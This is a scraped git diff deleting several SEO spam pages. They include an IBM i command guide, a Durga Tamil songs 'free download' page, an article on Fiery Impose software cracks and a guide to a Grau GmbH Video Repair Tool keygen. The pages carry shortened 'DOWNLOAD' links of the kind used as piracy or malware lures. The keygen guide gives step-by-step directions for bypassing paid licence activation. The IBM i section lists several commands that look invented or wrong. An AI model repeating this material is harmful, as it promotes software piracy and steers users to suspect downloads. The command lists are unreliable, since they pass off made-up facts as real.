      -ibm system i introduction book
      -ibm system i introduction online
      -ibm system i history pdf
      -ibm system i history ebook
      -ibm system i history book
      -ibm system i history online
      -ibm system i software pdf
      -ibm system i software ebook

      -

      How to create and manage libraries and objects

      -

      Libraries are containers that store objects , such as files , programs , commands , etc . Objects are entities that have names , attributes , methods , etc . To create and manage libraries and objects , you can use commands such as:

      -
        -
      • CRTLIB : To create a library
      • -
      • DLTLIB : To delete a library
      • -
      • WRKLIB : To work with libraries
      • -
      • DSPLIB : To display libraries
      • -
      • CRTxxx : To create an object of type xxx (e.g., CRTFIL , CRTPGM , CRTCMD , etc.)
      • -
      • DLTxxx : To delete an object of type xxx (e.g., DLTFILE , DLTPGM , DLTCMD , etc.)
      • -
      • WRKxxx : To work with objects of type xxx (e.g., WRKFILE , WRKPGM , WRKCMD , etc.)
      • -

        How to work with files and databases

        -

        Files are objects that store data in records and fields. Databases are collections of files that are related by keys and indexes. To work with files and databases, you can use commands such as:

        -
          -
        • CRTFIL: To create a file
        • -
        • DLTFIL: To delete a file
        • -
        • WRKFIL: To work with files
        • -
        • DSPFIL: To display files
        • -
        • CPYFIL: To copy files
        • -
        • SQL: To use Structured Query Language to manipulate data
        • -
        • STRQRY: To start the Query/400 tool to create and run queries
        • -
        • STRSQL: To start the SQL/400 tool to create and run SQL statements
        • -
        -

        How to run programs and jobs

        -

        Programs are objects that contain executable instructions that perform specific tasks. Jobs are units of work that run programs on the system. To run programs and jobs, you can use commands such as:

        -
          -
        • CRTBNDxxx: To create a bound program of type xxx (e.g., CRTBNDRPG, CRTBNDCBL, CRTBNDC, etc.)
        • -
        • CRTCLxxx: To create a control language program of type xxx (e.g., CRTCLP, CRTCLLE, etc.)
        • -
        • CALL: To call a program
        • -
        • SUBMIT: To submit a job to a job queue
        • -
        • WRKJOB: To work with jobs
        • -
        • DSPJOB: To display jobs
        • -
        • HLDJOB: To hold a job
        • -
        • RSMJOB: To resume a job
        • -
        • ENDJOB: To end a job
        • -
        -

        How to use the query and report tools

        -

        The query and report tools are programs that allow you to create and run queries and reports on your data. Queries are statements that retrieve data from files or databases based on certain criteria. Reports are documents that present data in a formatted and organized way. To use the query and report tools, you can use commands such as:

        -
          -
        • STRQRY: To start the Query/400 tool to create and run queries
        • -
        • STRSQL: To start the SQL/400 tool to create and run SQL statements
        • -
        • CRTQRYF: To create a query file that contains query definitions
        • -
        • RUNQRY: To run a query file or a query definition
        • -
        • CRTQMQRY: To create a query management query that contains SQL statements
        • -
        • RUNQMQRY: To run a query management query or an SQL statement
        • -
        • CRTQRPRTF: To create a query report file that contains report definitions
        • -
        • RUNQRPRTF: To run a query report file or a report definition
        • -
        -

        How to troubleshoot and debug errors

        -

        Errors are situations that prevent your system from performing normally or correctly. Debugging is the process of finding and fixing errors in your programs or data. To troubleshoot and debug errors, you can use commands such as:

        -
          -
        • DSPMSG: To display messages on your message queue or on your screen
        • -
        • DSPJOBLOG: To display the job log of your current or previous job
        • -
        • DSPFD: To display the file description of a file or a database
        • -
        • DSPFFD: To display the field description of a file or a database
        • -
        • DSPDBR: To display the database relations of a file or a database
        • -
        • DSPDTAARA: To display the data area of an object or a variable
        • -
        • DSPDTAQ: To display the data queue of an object or a variable
        • -
        • DSPUSRPRF: To display the user profile of yourself or another user
        • -
        • STRDBG: To start the interactive source debugger to debug your programs line by line
        • -
        • STRISDB: To start the interactive source debugger to debug your programs statement by statement
        • -
        -

        Where to find more resources on IBM i

        -

        If you want to learn more about IBM i , you can find many resources online or offline. Some of these resources are:

        -

        The official IBM documentation and support for IBM i

        -

        The official IBM documentation and support for IBM i are available on the IBM website at https://www.ibm.com/it-infrastructure/power/os/ibm-i . Here you can find manuals, guides, tutorials, videos, blogs, podcasts, webinars, forums, newsletters, events, etc. on various topics related to IBM i . You can also contact IBM for technical support or feedback.

        -

        The online communities and forums for IBM i users

        -

        The online communities and forums for IBM i users are platforms where you can interact with other IBM i users around the world. You can ask questions, share tips, exchange ideas, learn best practices, etc. on various topics related to IBM i . Some of these platforms are:

        -
          -
        • The IBM i Community at https://community.ibm.com/community/user/power/communities/community-home?CommunityKey=828ec0b9-5ee8-40c0-9b43-6d0f71acbbc2 . This is the official community for IBM i users hosted by IBM.
        • -
        • The Midrange.com at https://www.midrange.com . This is one of the oldest and largest communities for IBM i users.
        • -
        • The RPGPGM.com at https://www.rpgpgm.com . This is a blog that provides tips, tricks, examples, etc. on how to use RPG and other languages on IBM i .
        • -
        • The MC Press Online at https://www.mcpressonline.com . This is an online publisher that offers books, magazines, newsletters, webinars, etc. on various topics related to IBM i .
        • -
        -

        The best books and courses on IBM i

        -

        The best books and courses on IBM i are resources that can help you learn IBM i in a structured and comprehensive way. You can find them in libraries, bookstores, online platforms, etc. Some of these resources are:

        -
          -
        • The IBM i Programmer's Guide by Jim Buck and Brian May. This is a book that covers the fundamentals and advanced topics of IBM i programming using various languages and tools.
        • -
        • The Mastering IBM i by Jim Buck and Jerry Fottral. This is a book that covers the administration and management of IBM i systems using various commands and operations.
        • -
        • The Complete Guide to IBM i Backup and Recovery by Larry Youngren and Richard Dolewski. This is a book that covers the backup and recovery strategies and techniques for IBM i systems using various tools and methods.
        • -
        • The Udemy courses on IBM i by John Yorke. These are online courses that cover various topics related to IBM i , such as RPG, CL, SQL, DB2, etc.
        • -
        • The LinkedIn Learning courses on IBM i by Dan Riehl. These are online courses that cover various topics related to IBM i , such as security, performance, web development, etc.
        • -
        -

        Conclusion

        -

        In this article, you have learned what the AS/400 is, how to get started with it, and where to find more resources on it. The AS/400 is a powerful and versatile system for business applications that has many features and benefits. By following this guide, you can master the AS/400 in no time.

        -

        FAQs

        -

        Here are some frequently asked questions about the AS/400:

        -
          -
        1. What is the difference between AS/400, iSeries, System i , and IBM i ?
        2. -

          These are different names for the same system. AS/400 was the original name when it was launched in 1988. iSeries was the name used from 2000 to 2006. System i was the name used from 2006 to 2008. IBM i is the current name since 2008.

          -
        3. What are the advantages of AS/400 over other systems?
        4. -

          Some of the advantages of AS/400 over other systems are its reliability, security, scalability, compatibility, single-level storage model, integrated database, object-oriented architecture, graphical user interface, client-server model, etc.

          -
        5. What are the disadvantages of AS/400 over other systems?
        6. -

          Some of the disadvantages of AS/400 over other systems are its high cost, steep learning curve, limited availability of skilled programmers, outdated perception, proprietary nature, etc.

          -
        7. What are some of the applications that run on AS/400?
        8. -

          Some of the applications that run on AS/400 are SAP ERP , Oracle JD Edwards , Infor ERP , Microsoft Dynamics , IBM Lotus Notes , IBM WebSphere , etc.

          -
        9. What are some of the languages that can be used to program on AS/400?
        10. -

          Some of the languages that can be used to program on AS/400 are RPG , CL , COBOL , C , C++ , Java , PHP , Python , Ruby , etc.

          -
        -

        0a6ba089eb
        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md b/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md deleted file mode 100644 index 9c74f2ac92410e6baf7c15a3cfdcf51dbd3dac06..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md +++ /dev/null @@ -1,26 +0,0 @@ - -

        Durga Tamil Movie Songs Free Download - A Collection of Devotional Songs from the 1990s

        - -

        If you are looking for Durga Tamil movie songs free download, you have come to the right place. Durga is a compilation album of devotional songs dedicated to Goddess Durga, the supreme mother of the universe. The album was released in the 1990s and features some of the popular singers of that era, such as LR. Eswari, K. Veeramani, Veeramani Dasan, Mahanadhi Shobana, Susheela, Vani Jayaram, Anuradha Sriram and more.

        -

        durga tamil movie songs free download 1990's tamil


        DOWNLOAD ✑ ✑ ✑ https://tinourl.com/2uL1PK



        - -

        Durga Tamil movie songs free download consists of 18 songs that praise the various aspects and forms of Goddess Durga, such as Mahishasura Mardini, Aadumkaragam, Kongumani, Aadi Velliyile, Sri Mahishasura Mardini, Eeswariyea Magamaayi, 108 Namavali, Thukka Nivarana Ashtakam, Jaya Jaya, Deivathin Deivam, Kunkuma Archanai, Aadi Vellikizhamai, Yengalukkum Kuraiyum Undu, Na Manku Chottanikkara, Veppa Maram, Aadivarum Angalamma and 108 Potri.

        - -

        The songs are composed by Prashanth and Balajee and have a soothing and melodious tune that will fill your heart with devotion and peace. The lyrics are written by various poets and lyricists such as LR. Eswari, Panappakkam Sukumar, S. Bharathi Ganesh, Karumari Somu, Ulundurpettai Shanmugam, Kavi Nila and more. The songs are based on the traditional and folk music of Tamil Nadu and have a rich cultural and spiritual value.

        - -

        Durga Tamil movie songs free download is available on Raaga.com[^1^], a popular online music streaming platform that offers a wide range of Tamil songs from different genres and eras. You can listen to all the songs in high quality and download them for offline listening. You can also create your own playlists and share them with your friends and family.

        -

        - -

        Durga Tamil movie songs free download is a must-have for all the devotees of Goddess Durga who want to listen to some of the best devotional songs from the 1990s. The songs will inspire you to worship the divine mother with love and reverence and seek her blessings for your well-being and prosperity.

        - -

        If you want to know more about Goddess Durga and her significance in Hinduism, you can read some of the books and articles that are available online. Some of the recommended sources are:

        - -
          -
        • Durga: The Goddess in India by David Kinsley. This book explores the history, mythology, symbolism and worship of Durga in India. It also examines the various forms and names of Durga and how she is related to other Hindu deities.
        • -
        • Durga Puja: Celebrating the Goddess Then and Now by Sudeshna Banerjee. This book traces the evolution of Durga Puja, the annual festival that celebrates the victory of Durga over the demon Mahishasura. It also describes the rituals, customs, art and culture associated with the festival.
        • -
        • Durga: The Mother Goddess by Devdutt Pattanaik. This article provides a brief overview of the origin, attributes and stories of Durga. It also explains the symbolism and significance of Durga in Hinduism.
        • -
        - -

        Durga Tamil movie songs free download is a great way to enjoy some of the finest devotional music from the 1990s. The songs will uplift your mood and spirit and make you feel closer to the divine mother. Download them today and experience the power and grace of Durga.

        7b8c122e87
        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md b/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md deleted file mode 100644 index de006b3fd55c88e74dee01dfd8f1ec31f658f90f..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md +++ /dev/null @@ -1,132 +0,0 @@ - -

        Fiery Impose Software Crack: What You Need to Know

        -

        If you are looking for a way to create professional-looking PDF documents with ease, you might have heard of Fiery Impose software. This is a powerful and intuitive PDF imposition software that integrates with Fiery Command WorkStation, makeready software, and prepress tools. It allows you to customize imposition templates, preview jobs, merge and move pages, apply barcodes, and more.

        -

        However, you might also be tempted to use a Fiery Impose software crack instead of paying for the original product. A software crack is a modified version of a software that bypasses or removes its copy protection or activation mechanism. It is usually distributed for free or at a low cost on the internet.

        -

        Fiery impose software crack


        Download Ziphttps://tinourl.com/2uL4br



        -

        Why do people use software cracks? Some of the common reasons are:

        -
          -
        • To save money and avoid paying for expensive software licenses
        • -
        • To test the software before buying it
        • -
        • To access features that are not available in the trial or demo version
        • -
        • To use the software without any limitations or restrictions
        • -
        -

        While these reasons might sound appealing, using a Fiery Impose software crack is not a good idea. In fact, it can expose you to many risks and consequences that can outweigh any perceived benefits. In this article, we will explain why you should avoid using a Fiery Impose software crack and what are some alternatives that you can consider instead.

        -

        Risks and Consequences of Using Fiery Impose Software Crack

        -

        Using a Fiery Impose software crack can have serious implications for your legal status, security, quality, and ethics. Here are some of the possible outcomes that you might face if you use a Fiery Impose software crack:

        -

        Legal issues

        -

        Using a Fiery Impose software crack is illegal and violates the intellectual property rights of the software developer, Electronics for Imaging (EFI). According to their website, "EFI products are protected by patents in the U.S. and elsewhere. This product may be covered by one or more U.S. patents identified at www.efi.com/patents."

        -

        If you use a Fiery Impose software crack, you are infringing on these patents and could be sued by EFI for damages. You could also face criminal charges for piracy, which can result in fines or imprisonment depending on your jurisdiction.

        -

        Security threats

        -

        Using a Fiery Impose software crack can expose your computer and network to malware, viruses, spyware, ransomware, and other malicious programs. These can compromise your data, privacy, identity, and finances. They can also damage your hardware and software, causing errors, crashes, slowdowns, and data loss.

        -

        Fiery impose PDF imposition software
        -Fiery impose free trial download
        -Fiery impose dongle activation
        -Fiery impose tutorial video
        -Fiery impose integration with Duplo finishers
        -Fiery impose booklet creation guide
        -Fiery impose gangup layout templates
        -Fiery impose cutting and stacking options
        -Fiery impose variable data printing
        -Fiery impose hot folder setup
        -Fiery impose virtual printer configuration
        -Fiery impose job preset creation
        -Fiery impose export imposed PDF
        -Fiery impose last-minute edits
        -Fiery impose media catalog selection
        -Fiery impose barcode application
        -Fiery impose Command WorkStation integration
        -Fiery impose JobMaster and Compose compatibility
        -Fiery impose cross-platform support
        -Fiery impose Adobe Acrobat Pro 2020 features
        -How to use Fiery impose for sheet imposition
        -How to automate job submission with Fiery impose
        -How to preview jobs before printing with Fiery impose
        -How to merge and move pages with Fiery impose
        -How to customize imposition templates with Fiery impose
        -How to handle common layouts with Fiery impose
        -How to avoid manual calculations with Fiery impose
        -How to simplify proofing and approval process with Fiery impose
        -How to edit imposed jobs easily with Fiery impose
        -How to print variable data jobs with Fiery impose
        -How to define media requirements with Fiery impose
        -How to apply barcodes with Fiery impose
        -How to integrate with offline finishers with Fiery impose
        -How to switch between makeready and imposition with Fiery impose
        -How to use Mac or Windows with Fiery impose
        -Benefits of using Fiery impose for PDF imposition
        -Challenges of using Fiery impose for PDF imposition
        -Alternatives to using Fiery impose for PDF imposition
        -Reviews of using Fiery impose for PDF imposition
        -Tips and tricks for using Fiery impose for PDF imposition
        -Best practices for using Fiery impose for PDF imposition
        -Common errors and solutions for using Fiery impose for PDF imposition
        -Updates and patches for using Fiery impose for PDF imposition
        -License and pricing for using Fiery impose for PDF imposition
        -Support and downloads for using Fiery impose for PDF imposition
        -Training and certification for using Fiery impose for PDF imposition
        -User manual and documentation for using Fiery impose for PDF imposition
        -Forum and community for using Fiery impose for PDF imposition
        -Blog and news for using Fiery impose for PDF imposition

        -

        Software cracks are often distributed by hackers or cybercriminals who want to infect your system with malware or steal your information. They can also modify the software code to include backdoors, keyloggers, trojans, or other hidden features that can harm your system or allow remote access by unauthorized parties.

        -

        Quality and performance problems

        -

        Using a Fiery Impose software crack can affect the quality and performance of your PDF documents and printing jobs. Software cracks are often unstable, buggy, outdated, or incompatible with your system or printer. They can cause errors, glitches, distortions, missing features, or poor results.

        -

        Software cracks are also not supported by EFI or any other official source. This means that you will not receive any updates, patches, fixes, or improvements that EFI releases for their products. You will also not have access to any customer service, technical support, training, or resources that EFI provides for their customers.

        -

        Ethical and moral dilemmas

        -

        Using a Fiery Impose software crack can also raise ethical and moral questions about your integrity and professionalism. Software cracks are unfair to the software developers who invest time, money, and effort into creating quality products that benefit their customers. By using a software crack, you are depriving them of their rightful income and recognition.

        -

        Software cracks are also unfair to other customers who pay for the original product and abide by its terms and conditions. By using a software crack, you are gaining an unfair advantage over them and undermining their trust and loyalty.

        -

        Software cracks are also dishonest and deceptive to yourself and others. By using a software crack, you are pretending to have something that you do not own or deserve. You are also risking your reputation and credibility as a professional who values quality and ethics.

        -

        Alternatives to Using Fiery Impose Software Crack

        -

        If you want to use Fiery Impose software without breaking the law or compromising your security or quality, there are some alternatives that you can consider instead of using a Fiery Impose software crack:

        -

        Free trial version

        -

        If you want to test the software before buying it, you can request a 30-day free trial version from EFI's website. This will allow you to experience the full functionality of Fiery Impose software without any limitations or restrictions. You will also receive technical support from EFI during the trial period. You can then decide whether to purchase the product or not after the trial expires.

        -

        Subscription plan

        -

        If you want to use the software without paying a large upfront cost, you can opt for a subscription plan from EFI's website. This will allow you to pay a monthly or annual fee for using Fiery Impose software, depending on your needs and budget. You will also receive updates, patches, fixes, and improvements from EFI as long as your subscription is active. You can cancel your subscription at any time if you no longer need the product.

        -

        Other PDF imposition software

        -

        If you want to use another PDF imposition software that is cheaper or more suitable for your needs, you can look for other options in the market. There are many PDF imposition software available online, some of which are free or open source. However, you should be careful when choosing another PDF imposition software, as some of them may not be reliable, secure, or compatible with your system or printer. You should also check their features, reviews, and ratings before downloading or installing them.

        -

        Conclusion

        -

        In conclusion, using a Fiery Impose software crack is not worth it.

        It can expose you to legal issues, security threats, quality and performance problems, and ethical and moral dilemmas. You might end up paying more than you save, or losing more than you gain. You might also damage your reputation and credibility as a professional who values quality and ethics.

        -

        Instead of using a Fiery Impose software crack, you should consider using the original product or one of its alternatives. You can request a free trial version, opt for a subscription plan, or look for other PDF imposition software in the market. These options will provide you with a better experience, support, and results.

        -

        Fiery Impose software is a great tool for creating professional-looking PDF documents with ease. It offers many features and benefits that can boost your production efficiency and quality. However, you should use it legally and ethically, and avoid using a Fiery Impose software crack that can harm you and others.

        -

        FAQs

        -

        Here are some frequently asked questions about Fiery Impose software and software cracks:

        - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        QuestionAnswer
        How much does Fiery Impose software cost?The price of Fiery Impose software depends on the type of license and the number of users. You can contact EFI or your local dealer for a quote.
        How can I get technical support for Fiery Impose software?You can get technical support for Fiery Impose software from EFI or your local dealer. You can also access online resources such as manuals, videos, forums, and webinars from EFI's website.
        What are the system requirements for Fiery Impose software?The system requirements for Fiery Impose software are:
        - A computer running Windows 10 or macOS 10.15 or later
        - A minimum of 4 GB of RAM
        - A minimum of 2 GB of free disk space
        - A network connection to a Fiery server
        - Adobe Acrobat Pro 2020 (optional)
        What are the benefits of using Fiery Impose software?Some of the benefits of using Fiery Impose software are:
        - It allows you to create professional-looking PDF documents with ease
        - It integrates with Fiery Command WorkStation, makeready software, and prepress tools
        - It offers a fully visual and intuitive interface that simplifies imposition tasks
        - It supports various imposition layouts, features, and options
        - It enables automated job submission and integration with offline finishers
        What are the drawbacks of using a Fiery Impose software crack?Some of the drawbacks of using a Fiery Impose software crack are:
        - It is illegal and violates the intellectual property rights of EFI
        - It exposes your computer and network to malware, viruses, spyware, ransomware, and other malicious programs
        - It affects the quality and performance of your PDF documents and printing jobs
        - It deprives EFI and other customers of their rightful income and recognition
        - It damages your reputation and credibility as a professional who values quality and ethics
        -

        0a6ba089eb
        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md b/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md deleted file mode 100644 index cd7c6b26a866d2e321b04e243e4a01c501f34697..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md +++ /dev/null @@ -1,102 +0,0 @@ -
        -

        Grau Gmbh Video Repair Tool Keygen 17: How to Fix Corrupted or Damaged Video Files

        -

        Have you ever encountered a situation where your video files are corrupted or damaged due to various reasons, such as camera error, power failure, virus attack, improper transfer, etc.? If yes, then you know how frustrating it can be to lose your precious memories or important data. Fortunately, there is a solution for you: Grau Gmbh Video Repair Tool Keygen 17.

        -

        Grau Gmbh Video Repair Tool Keygen 17


        Download Filehttps://tinourl.com/2uL4bv



        -

        Introduction

        -

        In this article, we will introduce you to Grau Gmbh Video Repair Tool Keygen 17, a powerful and easy-to-use software that can repair and fix broken or damaged video files (MOV, MP4, 3GP, M4V) that do not play in your media player. We will also show you how to use it step by step, and share some tips and tricks for using it effectively.

        -

        What is Grau Gmbh Video Repair Tool?

        -

        Grau Gmbh Video Repair Tool is a do-it-yourself video repair software that can automatically reconstruct the raw video and audio stream data of corrupted or damaged video files. It supports various video codecs and formats, such as avc1 (H264/AVC), hevc (H265), mp4v (H264/ISO), MPG2 (MPEG-2 / XDCAM), jpg (Motion JPEG), icod (Apple Intermediate Codec), dvc (DVCPRO), apch (ProRes 4444), etc. It can also repair video files that are truncated, broken, corrupt or damaged by cameras, drones, smartphones, etc.

        -

        What is Keygen 17?

        -

        Keygen 17 is a script that can generate a license key for Grau Gmbh Video Repair Tool. It is based on a formula that uses the current hour and minute of your system clock. You can run it from the command line or use a batch file or shell script. It is available on GitHub for free.

        -

        Why do you need Grau Gmbh Video Repair Tool Keygen 17?

        -

        You need Grau Gmbh Video Repair Tool Keygen 17 because Grau Gmbh Video Repair Tool is not free. It costs €29 for repairing one video file, €99 for repairing up to five video files, and €299 for unlimited repairs. However, with Keygen 17, you can generate a license key that can activate Grau Gmbh Video Repair Tool for free. This way, you can save money and time while repairing your corrupted or damaged video files.

        -

        How to use Grau Gmbh Video Repair Tool Keygen 17

        -

        Now that you know what Grau Gmbh Video Repair Tool Keygen 17 is and why you need it, let's see how to use it in six easy steps.

        -

        Step 1: Download and install Grau Gmbh Video Repair Tool

        -

        The first step is to download and install Grau Gmbh Video Repair Tool from its official website . You can choose between Windows and Mac versions according to your operating system. The installation process is simple and straightforward. Just follow the instructions on the screen.

        -

        Grau Gmbh Video Repair Tool Crack
        -Grau Gmbh Video Repair Tool Activation Code
        -Grau Gmbh Video Repair Tool Serial Number
        -Grau Gmbh Video Repair Tool License Key
        -Grau Gmbh Video Repair Tool Free Download
        -Grau Gmbh Video Repair Tool Full Version
        -Grau Gmbh Video Repair Tool Torrent
        -Grau Gmbh Video Repair Tool Patch
        -Grau Gmbh Video Repair Tool Registration Code
        -Grau Gmbh Video Repair Tool Key Generator
        -Grau Gmbh Video Repair Tool Movdump Keygen
        -Grau Gmbh Video Repair Tool Github
        -Grau Gmbh Video Repair Tool Review
        -Grau Gmbh Video Repair Tool Tutorial
        -Grau Gmbh Video Repair Tool Manual
        -Grau Gmbh Video Repair Tool Alternative
        -Grau Gmbh Video Repair Tool Online
        -Grau Gmbh Video Repair Tool Mac
        -Grau Gmbh Video Repair Tool Windows
        -Grau Gmbh Video Repair Tool Linux
        -Grau Gmbh Video Repair Tool Android
        -Grau Gmbh Video Repair Tool iPhone
        -Grau Gmbh Video Repair Tool iPad
        -Grau Gmbh Video Repair Tool GoPro
        -Grau Gmbh Video Repair Tool DJI Mavic Pro
        -Grau Gmbh Video Repair Tool Canon 60D
        -Grau Gmbh Video Repair Tool Blackmagic URSA Mini 4.6K
        -Grau Gmbh Video Repair Tool Flip Ultra HD
        -Grau Gmbh Video Repair Tool HTC EVO 4G
        -Grau Gmbh Video Repair Tool Contour HD Helmet
        -Grau Gmbh Video Repair Tool Drift HD720
        -Grau Gmbh Video Repair Tool ActionPro X7
        -Grau Gmbh Video Repair Tool MP4 File Format
        -Grau Gmbh Video Repair Tool MOV File Format
        -Grau Gmbh Video Repair Tool 3GP File Format
        -Grau Gmbh Video Repair Tool M4V File Format
        -Grau Gmbh Video Repair Tool AVC1 Codec Format
        -Grau Gmbh Video Repair Tool HEVC Codec Format
        -Grau Gmbh Video Repair Tool MP4V Codec Format
        -Grau Gmbh Video Repair Tool MPG2 Codec Format
        -Grau Gmbh Video Repair Tool JPG Codec Format
        -Grau Gmbh Video Repair Tool ICOD Codec Format
        -Grau Gmbh Video Repair Tool DVC Codec Format
        -Grau Gmbh Video Repair Tool APCH Codec Format
        -Grau Gmbh Video Repair Tool Truncated Files Recovery
        -Grau Gmbh Video Repair Tool Corrupt Files Recovery
        -Grau Gmbh Video Repair Tool Damaged Files Recovery
        -Grau Gmbh Video Repair Tool Broken Files Recovery

        -

        Step 2: Run Keygen 17 to generate a license key

        -

        The second step is to run Keygen 17 to generate a license key for Grau Gmbh Video Repair Tool. You can download Keygen 17 from GitHub as a zip file. Extract it to a folder of your choice. Then open a command prompt (Windows) or a terminal (Mac) and navigate to the folder where you extracted Keygen 17. Type keygen.bat (Windows) or keygen.sh (Mac) and press Enter. You will see a license key displayed on the screen. Copy it to your clipboard.

        -

        Step 3: Activate Grau Gmbh Video Repair Tool with the license key

        -

        The third step is to activate Grau Gmbh Video Repair Tool with the license key that you generated in step 2. Launch Grau Gmbh Video Repair Tool from your desktop or start menu. Click on the About button on the top right corner of the main window. Then click on Enter License. Paste the license key that you copied in step 2 into the text box and click OK. You will see a message saying Licensed successfully!. Congratulations! You have activated Grau Gmbh Video Repair Tool for free.

        -

        Step 4: Select the corrupted or damaged video files

        -

        The fourth step is to select the corrupted or damaged video files that you want to repair with Grau Gmbh Video Repair Tool. Click on Add movie on the top left corner of the main window. Browse to the folder where you stored your corrupted or damaged video files and select them. You can select multiple files at once by holding down Ctrl (Windows) or Command (Mac) while clicking on them. Then click Open. You will see the selected files listed in the main window with their names, sizes, formats and statuses.

        -

        Step 5: Choose the repair options and start the repair process

        -

        The fifth step is to choose the repair options and start the repair process with Grau Gmbh Video Repair Tool. Click on Options on the top right corner of the main window. You will see a dialog box with various repair parameters that you can adjust according to your needs. For example, you can choose whether to enable PCM detection for PCM audio codecs, whether to enable AAC detection for AAC audio codecs, whether to enable AVC1 single mode for AVC1 video codecs, whether to enable No CTTS repair for stuttering videos, etc. You can also choose whether to use reference movies for finding missing movie meta-data and parameters if available. For more details on each option, please refer to the official website . After choosing your desired options, click OK. Then click on Scan on the top left corner of the main window. The scan process will take some time depending on the size and number of your selected files. When it is done, you will see a green check mark next to each file indicating that it is ready for repair.

        -

        Step 6: Preview and save the repaired video files

        -

        The sixth and final step is to preview and save the repaired video files with Grau Gmbh Video Repair Tool. Click on Show Repaired Files on the bottom right corner of the main window. You will see a new window with all your repaired files listed with their names, sizes, formats and statuses. You can double-click on any file to preview it in your default media player. If you are satisfied with the result, you can click on Select All on the bottom left corner of the new window to select all your repaired files.

        Step 6: Preview and save the repaired video files

        -

        The sixth and final step is to preview and save the repaired video files with Grau Gmbh Video Repair Tool. Click on Show Repaired Files on the bottom right corner of the main window. You will see a new window with all your repaired files listed with their names, sizes, formats and statuses. You can double-click on any file to preview it in your default media player. If you are satisfied with the result, you can click on Select All on the bottom left corner of the new window to select all your repaired files. Then click on Save Repaired Files on the bottom right corner of the new window. You will be asked to choose a destination folder where you want to save your repaired files. Choose a folder of your choice and click OK. The save process will take some time depending on the size and number of your selected files. When it is done, you will see a message saying All files saved successfully!. Congratulations! You have successfully repaired your corrupted or damaged video files with Grau Gmbh Video Repair Tool Keygen 17.

        -

        Tips and tricks for using Grau Gmbh Video Repair Tool Keygen 17

        -

        To make the most out of Grau Gmbh Video Repair Tool Keygen 17, here are some tips and tricks that you can follow:

        -

        Tip 1: Backup your original video files before repairing them

        -

        It is always a good idea to backup your original video files before repairing them with Grau Gmbh Video Repair Tool Keygen 17. This way, you can avoid losing your original data in case something goes wrong during the repair process. You can use an external hard drive, a USB flash drive, a cloud storage service, or any other backup method that you prefer.

        -

        Tip 2: Use a reliable recovery software to recover deleted or lost video files

        -

        If you accidentally deleted or lost your video files from your camera, drone, smartphone, etc., you can use a reliable recovery software to recover them before repairing them with Grau Gmbh Video Repair Tool Keygen 17. There are many recovery software available online that can help you recover your deleted or lost video files from various storage devices. However, make sure to choose a reputable and trustworthy one that can guarantee the quality and safety of your recovered data.

        -

        Tip 3: Adjust the repair parameters according to your video codec and format

        -

        Grau Gmbh Video Repair Tool Keygen 17 offers various repair parameters that you can adjust according to your video codec and format. For example, if your video codec is avc1 (H264/AVC), you can enable AVC1 single mode to speed up the repair process. If your video codec is hevc (H265), you can enable HEVC mode to improve the repair quality. If your video format is MOV, MP4, 3GP or M4V, you can enable QuickTime container mode to fix the container issues. For more details on each parameter, please refer to the official website .

        -

        Conclusion

        -

        In conclusion, Grau Gmbh Video Repair Tool Keygen 17 is a powerful and easy-to-use software that can repair and fix broken or damaged video files (MOV, MP4, 3GP, M4V) that do not play in your media player. It supports various video codecs and formats, such as avc1 (H264/AVC), hevc (H265), mp4v (H264/ISO), MPG2 (MPEG-2 / XDCAM), jpg (Motion JPEG), icod (Apple Intermediate Codec), dvc (DVCPRO), apch (ProRes 4444), etc. It can also repair video files that are truncated, broken, corrupt or damaged by cameras, drones, smartphones, etc. With Keygen 17, you can generate a license key that can activate Grau Gmbh Video Repair Tool for free. This way, you can save money and time while repairing your corrupted or damaged video files.

        -

        We hope this article has helped you understand how to use Grau Gmbh Video Repair Tool Keygen 17 and how to fix corrupted or damaged video files with it. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

        -

        FAQs

        -
          -
        • Q: How long does it take to repair a video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: The repair time depends on several factors, such as the size and number of your selected files, the speed of your computer and internet connection, the degree of corruption or damage of your video files, etc. Generally speaking, it may take from a few minutes to several hours to repair a video file with Grau Gmbh Video Repair Tool Keygen 17.
        • -
        • Q: How much disk space do I need to repair a video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: You need at least twice as much disk space as the size of your original video file to repair it with Grau Gmbh Video Repair Tool Keygen 17. For example, if your original video file is 1 GB in size, you need at least 2 GB of free disk space to repair it.
        • -
        • Q: Can I repair any video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: No, you cannot repair any video file with Grau Gmbh Video Repair Tool Keygen 17. Grau Gmbh Video Repair Tool Keygen 17 can only repair video files that are based on QuickTime container format (MOV, MP4, 3GP, M4V) and use one of the supported codec formats (avc1, hevc, mp4v, MPG2, jpg, icod, dvc, apch, etc.). It cannot repair other types of video files, such as AVI, WMV, MKV, FLV, etc.
        • -
        • Q: Can I edit the repaired video files with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: No, you cannot edit the repaired video files with Grau Gmbh Video Repair Tool Keygen 17. Grau Gmbh Video Repair Tool Keygen 17 is only a repair software that can fix corrupted or damaged video files. It cannot edit them in any way. If you want to edit your repaired video files, you need to use another software that can edit videos, such as Windows Movie Maker, iMovie, Final Cut Pro, Adobe Premiere Pro, etc.
        • -
        • Q: Is Grau Gmbh Video Repair Tool Keygen 17 safe and legal to use?
        • -
